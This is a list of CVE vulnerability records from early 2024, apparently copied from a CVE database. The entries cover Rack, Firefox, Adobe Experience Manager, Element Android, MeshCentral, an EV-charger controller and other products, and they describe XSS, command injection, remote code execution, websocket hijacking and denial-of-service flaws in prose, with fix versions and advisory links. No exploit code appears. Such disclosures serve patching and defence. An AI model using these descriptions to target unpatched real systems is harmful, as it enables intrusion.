URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26142.yml Assigned (20240214)
CVE 2024 26141 Candidate Rack is a modular Ruby web server interface. Carefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue. Vulnerable applications will use the `Rack::File` middleware or the `Rack::Utils.byte_ranges` methods (this includes Rails applications). The vulnerability is fixed in 3.0.9.1 and 2.2.8.1. MISC:https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944 | URL:https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944 | MISC:https://github.com/rack/rack/commit/4849132bef471adb21131980df745f4bb84de2d9 | URL:https://github.com/rack/rack/commit/4849132bef471adb21131980df745f4bb84de2d9 | MISC:https://github.com/rack/rack/commit/62457686b26d33a15a254c7768c2076e8e02b48b | URL:https://github.com/rack/rack/commit/62457686b26d33a15a254c7768c2076e8e02b48b | MISC:https://github.com/rack/rack/security/advisories/GHSA-xj5v-6v4g-jfw6 | URL:https://github.com/rack/rack/security/advisories/GHSA-xj5v-6v4g-jfw6 | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26141.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26141.yml Assigned (20240214)
CVE 2024 26140 Candidate com.yetanalytics/lrs is the Yet Analytics Core LRS Library. Prior to version 1.2.17 of the LRS library and version 0.7.5 of SQL LRS, a maliciously crafted xAPI statement could be used to perform script or other tag injection in the LRS Statement Browser. The problem is patched in version 1.2.17 of the LRS library and version 0.7.5 of SQL LRS. No known workarounds exist. MISC:https://clojars.org/com.yetanalytics/lrs/versions/1.2.17 | URL:https://clojars.org/com.yetanalytics/lrs/versions/1.2.17 | MISC:https://github.com/yetanalytics/lrs/commit/d7f4883bc2252337d25e8bba2c7f9d172f5b0621 | URL:https://github.com/yetanalytics/lrs/commit/d7f4883bc2252337d25e8bba2c7f9d172f5b0621 | MISC:https://github.com/yetanalytics/lrs/releases/tag/v1.2.17 | URL:https://github.com/yetanalytics/lrs/releases/tag/v1.2.17 | MISC:https://github.com/yetanalytics/lrs/security/advisories/GHSA-7rw2-3hhp-rc46 | URL:https://github.com/yetanalytics/lrs/security/advisories/GHSA-7rw2-3hhp-rc46 | MISC:https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5 | URL:https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5 Assigned (20240214)
CVE 2024 2614 Candidate Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 | URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1685358%2C1861016%2C1880405%2C1881093 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 26138 Candidate The XWiki licensor application, which manages and enforce application licenses for paid extensions, includes the document `Licenses.Code.LicenseJSON` that provides information for admins regarding active licenses. This document is public and thus exposes this information publicly. The information includes the instance's id as well as first and last name and email of the license owner. This is a leak of information that isn't supposed to be public. The instance id allows associating data on the active installs data with the concrete XWiki instance. Active installs assures that "there's no way to find who's having a given UUID" (referring to the instance id). Further, the information who the license owner is and information about the obtained licenses can be used for targeted phishing attacks. Also, while user information is normally public, email addresses might only be displayed obfuscated, depending on the configuration. This has been fixed in Application Licensing 1.24.2. There are no known workarounds besides upgrading. MISC:https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API | URL:https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API | MISC:https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6 | URL:https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6 | MISC:https://github.com/xwikisas/application-licensing/security/advisories/GHSA-4hfp-m9gv-m753 | URL:https://github.com/xwikisas/application-licensing/security/advisories/GHSA-4hfp-m9gv-m753 Assigned (20240214)
CVE 2024 26136 Candidate kedi ElectronCord is a bot management tool for Discord. Commit aaaeaf4e6c99893827b2eea4dd02f755e1e24041 exposes an account access token in the `config.json` file. Malicious actors could potentially exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions on behalf of the repository owner. As of time of publication, it is unknown whether the owner of the repository has rotated the token or taken other mitigation steps aside from informing users of the situation. MISC:https://github.com/kedi/ElectronCord/commit/aaaeaf4e6c99893827b2eea4dd02f755e1e24041 | URL:https://github.com/kedi/ElectronCord/commit/aaaeaf4e6c99893827b2eea4dd02f755e1e24041 | MISC:https://github.com/kedi/ElectronCord/security/advisories/GHSA-ppwc-5vwp-mhw8 | URL:https://github.com/kedi/ElectronCord/security/advisories/GHSA-ppwc-5vwp-mhw8 Assigned (20240214)
CVE 2024 26135 Candidate MeshCentral is a full computer management web site. Versions prior to 1.1.21 a cross-site websocket hijacking (CSWSH) vulnerability within the control.ashx endpoint. This component is the primary mechanism used within MeshCentral to perform administrative actions on the server. The vulnerability is exploitable when an attacker is able to convince a victim end-user to click on a malicious link to a page hosting an attacker-controlled site. The attacker can then originate a cross-site websocket connection using client-side JavaScript code to connect to `control.ashx` as the victim user within MeshCentral. Version 1.1.21 contains a patch for this issue. MISC:https://github.com/Ylianst/MeshCentral/commit/f2e43cc6da9f5447dbff0948e6c6024c8a315af3 | URL:https://github.com/Ylianst/MeshCentral/commit/f2e43cc6da9f5447dbff0948e6c6024c8a315af3 | MISC:https://github.com/Ylianst/MeshCentral/security/advisories/GHSA-cp68-qrhr-g9h8 | URL:https://github.com/Ylianst/MeshCentral/security/advisories/GHSA-cp68-qrhr-g9h8 Assigned (20240214)
CVE 2024 26134 Candidate cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue. MISC:https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542 | URL:https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542 | MISC:https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df | URL:https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df | MISC:https://github.com/agronholm/cbor2/pull/204 | URL:https://github.com/agronholm/cbor2/pull/204 | MISC:https://github.com/agronholm/cbor2/releases/tag/5.6.2 | URL:https://github.com/agronholm/cbor2/releases/tag/5.6.2 | MISC:https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m | URL:https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m Assigned (20240214)
CVE 2024 26133 Candidate EventStoreDB (ESDB) is an operational database built to store events. A vulnerability has been identified in the projections subsystem in versions 20 prior to 20.10.6, 21 prior to 21.10.11, 22 prior to 22.10.5, and 23 prior to 23.10.1. Only database instances that use custom projections are affected by this vulnerability. User passwords may become accessible to those who have access to the chunk files on disk, and users who have read access to system streams. Only users in the `$admins` group can access system streams by default. ESDB 23.10.1, 22.10.5, 21.10.11, and 20.10.6 contain a patch for this issue. Users should upgrade EventStoreDB, reset the passwords for current and previous members of `$admins` and `$ops` groups, and, if a password was reused in any other system, reset it in those systems to a unique password to follow best practices. If an upgrade cannot be done immediately, reset the passwords for current and previous members of `$admins` and `$ops` groups. Avoid creating custom projections until the patch has been applied. MISC:https://developers.eventstore.com/cloud/ops/#upgrading-eventstoredb-version | URL:https://developers.eventstore.com/cloud/ops/#upgrading-eventstoredb-version | MISC:https://developers.eventstore.com/server/v22.10/upgrade-guide.html#upgrade-guide-for-eventstoredb-22-10 | URL:https://developers.eventstore.com/server/v22.10/upgrade-guide.html#upgrade-guide-for-eventstoredb-22-10 | MISC:https://github.com/EventStore/EventStore/commit/6d4edee18c7fe886abffe58fa1f97d72681b24bf | URL:https://github.com/EventStore/EventStore/commit/6d4edee18c7fe886abffe58fa1f97d72681b24bf | MISC:https://github.com/EventStore/EventStore/security/advisories/GHSA-6r53-v8hj-x684 | URL:https://github.com/EventStore/EventStore/security/advisories/GHSA-6r53-v8hj-x684 | MISC:https://www.eventstore.com/blog/eventstoredb-security-release-23.10-22.10-21.10-and-20.10-for-cve-2024-26133 | URL:https://www.eventstore.com/blog/eventstoredb-security-release-23.10-22.10-21.10-and-20.10-for-cve-2024-26133 | MISC:https://www.eventstore.com/blog/new-version-strategy | URL:https://www.eventstore.com/blog/new-version-strategy Assigned (20240214)
CVE 2024 26132 Candidate Element Android is an Android Matrix Client. A third-party malicious application installed on the same phone can force Element Android, version 0.91.0 through 1.6.12, to share files stored under the `files` directory in the application's private data directory to an arbitrary room. The impact of the attack is reduced by the fact that the databases stored in this folder are encrypted. However, it contains some other potentially sensitive information, such as the FCM token. Forks of Element Android which have set `android:exported="false"` in the `AndroidManifest.xml` file for the `IncomingShareActivity` activity are not impacted. This issue is fixed in Element Android 1.6.12. There is no known workaround to mitigate the issue. MISC:https://element.io/blog/security-release-element-android-1-6-12 | URL:https://element.io/blog/security-release-element-android-1-6-12 | MISC:https://github.com/element-hq/element-android/commit/8f9695a9a8d944cb9b92568cbd76578c51d32e07 | URL:https://github.com/element-hq/element-android/commit/8f9695a9a8d944cb9b92568cbd76578c51d32e07 | MISC:https://github.com/element-hq/element-android/security/advisories/GHSA-8wj9-cx7h-pvm4 | URL:https://github.com/element-hq/element-android/security/advisories/GHSA-8wj9-cx7h-pvm4 Assigned (20240214)
CVE 2024 26131 Candidate Element Android is an Android Matrix Client. Element Android version 1.4.3 through 1.6.10 is vulnerable to intent redirection, allowing a third-party malicious application to start any internal activity by passing some extra parameters. Possible impact includes making Element Android display an arbitrary web page, executing arbitrary JavaScript; bypassing PIN code protection; and account takeover by spawning a login screen to send credentials to an arbitrary home server. This issue is fixed in Element Android 1.6.12. There is no known workaround to mitigate the issue. MISC:https://element.io/blog/security-release-element-android-1-6-12 | URL:https://element.io/blog/security-release-element-android-1-6-12 | MISC:https://github.com/element-hq/element-android/commit/53734255ec270b0814946350787393dfcaa2a5a9 | URL:https://github.com/element-hq/element-android/commit/53734255ec270b0814946350787393dfcaa2a5a9 | MISC:https://github.com/element-hq/element-android/security/advisories/GHSA-j6pr-fpc8-q9vm | URL:https://github.com/element-hq/element-android/security/advisories/GHSA-j6pr-fpc8-q9vm | MISC:https://support.google.com/faqs/answer/9267555?hl=en | URL:https://support.google.com/faqs/answer/9267555?hl=en Assigned (20240214)
CVE 2024 26130 Candidate cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Starting in version 38.0.0 and prior to version 42.0.4, if `pkcs12.serialize_key_and_certificates` is called with both a certificate whose public key did not match the provided private key and an `encryption_algorithm` with `hmac_hash` set (via `PrivateFormat.PKCS12.encryption_builder().hmac_hash(...)`, then a NULL pointer dereference would occur, crashing the Python process. This has been resolved in version 42.0.4, the first version in which a `ValueError` is properly raised. MISC:https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55 | URL:https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55 | MISC:https://github.com/pyca/cryptography/pull/10423 | URL:https://github.com/pyca/cryptography/pull/10423 | MISC:https://github.com/pyca/cryptography/security/advisories/GHSA-6vqw-3v5j-54x4 | URL:https://github.com/pyca/cryptography/security/advisories/GHSA-6vqw-3v5j-54x4 Assigned (20240214)
CVE 2024 2613 Candidate Data was not properly sanitized when decoding a QUIC ACK frame; this could have led to unrestricted memory consumption and a crash. This vulnerability affects Firefox < 124. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1875701 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1875701 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ Assigned (20240318)
CVE 2024 26129 Candidate PrestaShop is an open-source e-commerce platform. Starting in version 8.1.0 and prior to version 8.1.4, PrestaShop is vulnerable to path disclosure in a JavaScript variable. A patch is available in version 8.1.4. MISC:https://github.com/PrestaShop/PrestaShop/commit/444bd0dea581659918fe2067541b9863cf099dd5 | URL:https://github.com/PrestaShop/PrestaShop/commit/444bd0dea581659918fe2067541b9863cf099dd5 | MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr | URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr | MISC:https://owasp.org/www-community/attacks/Full_Path_Disclosure | URL:https://owasp.org/www-community/attacks/Full_Path_Disclosure Assigned (20240214)
CVE 2024 26128 Candidate baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability. MISC:https://basercms.net/security/JVN_73283159 | URL:https://basercms.net/security/JVN_73283159 | MISC:https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c | URL:https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c | MISC:https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5 | URL:https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5 Assigned (20240214)
CVE 2024 26125 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 2612 Candidate If an attacker could find a way to trigger a particular code path in `SafeRefPtr`, it could have triggered a crash or potentially be leveraged to achieve code execution. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879444 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879444 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 26119 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 26118 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 2611 Candidate A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1876675 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1876675 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 2610 Candidate Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871112 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871112 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 2609 Candidate The permission prompt input delay could have expired while the window is not in focus, which made the prompt vulnerable to clickjacking by malicious websites. This vulnerability affects Firefox < 124. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1866100 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1866100 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ Assigned (20240318)
CVE 2024 26080 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 2608 Candidate `AppendEncodedAttributeValue(), ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1880692 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1880692 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 2607 Candidate Return registers were overwritten which could have allowed an attacker to execute arbitrary code. *Note:* This issue only affected Armv7-A systems. Other operating systems are unaffected. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879939 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879939 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 26064 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into a webpage. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. Exploitation of this issue requires user interaction. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 26063 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by an Information Exposure vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain unauthorized access to sensitive information, potentially bypassing security measures. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 2606 Candidate Passing invalid data could have led to invalid wasm values being created, such as arbitrary integers turning into pointer values. This vulnerability affects Firefox < 124. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879237 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879237 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ Assigned (20240318)
CVE 2024 2605 Candidate An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1872920 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1872920 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ Assigned (20240318)
CVE 2024 26044 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into a webpage. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 26042 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 2604 Candidate A vulnerability was found in SourceCodester File Manager App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update-file.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257182 is the identifier assigned to this vulnerability. MISC:VDB-257182 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257182 | MISC:VDB-257182 | SourceCodester File Manager App update-file.php unrestricted upload | URL:https://vuldb.com/?id.257182 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20File%20Manager%20App/Arbitrary%20File%20Upload%20-%20update-file.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20File%20Manager%20App/Arbitrary%20File%20Upload%20-%20update-file.php.md Assigned (20240318)
CVE 2024 26032 Candidate Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. Exploitation of this issue requires user interaction. MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html | URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html Assigned (20240214)
CVE 2024 26018 Candidate Cross-site scripting vulnerability exists in TvRock 0.9t8a. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable, therefore, users should consider stop using TvRock 0.9t8a. MISC:https://jvn.jp/en/jp/JVN69107517/ | URL:https://jvn.jp/en/jp/JVN69107517/ Assigned (20240305)
CVE 2024 26016 Candidate A low privilege authenticated user could import an existing dashboard or chart that they do not have access to and then modify its metadata, thereby gaining ownership of the object. However, it's important to note that access to the analytical data of these charts and dashboards would still be subject to validation based on data access privileges. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1.Users are recommended to upgrade to version 3.1.1, which fixes the issue. MISC:https://lists.apache.org/thread/76v1jjcylgk4p3m0258qr359ook3vl8s | URL:https://lists.apache.org/thread/76v1jjcylgk4p3m0258qr359ook3vl8s | MLIST:[oss-security] 20240228 CVE-2024-26016: Apache Superset: Improper authorization validation on dashboards and charts import | URL:http://www.openwall.com/lists/oss-security/2024/02/28/7 Assigned (20240214)
CVE 2024 26005 Candidate An unauthenticated remote attacker can gain service level privileges through an incomplete cleanup during service restart after a DoS. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 26004 Candidate An unauthenticated remote attacker can DoS a control agent due to access of a uninitialized pointer which may prevent or disrupt the charging functionality. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 26003 Candidate An unauthenticated remote attacker can DoS the control agent due to a out-of-bounds read which may prevent or disrupt the charging functionality. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 26002 Candidate An improper input validation in the Qualcom plctool allows a local attacker with low privileges to gain root access by changing the ownership of specific files. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 26001 Candidate An unauthenticated remote attacker can write memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 26000 Candidate An unauthenticated remote attacker can read memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25999 Candidate An unauthenticated local attacker can perform a privilege escalation due to improper input validation in the OCPP agent service. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25998 Candidate An unauthenticated remote attacker can perform a command injection in the OCPP Service with limited privileges due to improper input validation. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25997 Candidate An unauthenticated remote attacker can perform a log injection due to improper input validation. Only a certain log file is affected. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25996 Candidate An unauthenticated remote attacker can perform a remote code execution due to an origin validation error. The access is limited to the service user. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25995 Candidate An unauthenticated remote attacker can modify configurations to perform a remote code execution due to a missing authentication for a critical function. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
